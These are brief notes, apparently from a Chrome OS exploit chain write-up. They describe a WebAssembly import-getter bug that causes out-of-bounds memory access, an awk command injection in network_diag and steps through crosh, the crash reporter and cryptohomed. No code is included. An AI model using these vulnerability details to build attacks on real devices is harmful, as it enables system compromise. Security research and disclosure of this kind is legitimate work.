Chrome OS exploit: WebAsm, Site Isolation, crosh, crash reporter, cryptohomed
Tons of fun stuff going on here.
Imports can be getters, which run while the instance is being built and is not in a consistent state. If the getter builds another instance for the same module, then the instances will share a WasmCompiledModule, but will have different ArrayBuffers for memory. Compiled module will reference one memory buffer. If the second memory grows, then the compiled module gets confused and relocates to OOB memory.
war-extension to crosh with process limit
network_diag has an awk command injection bug.
lamecalc should open again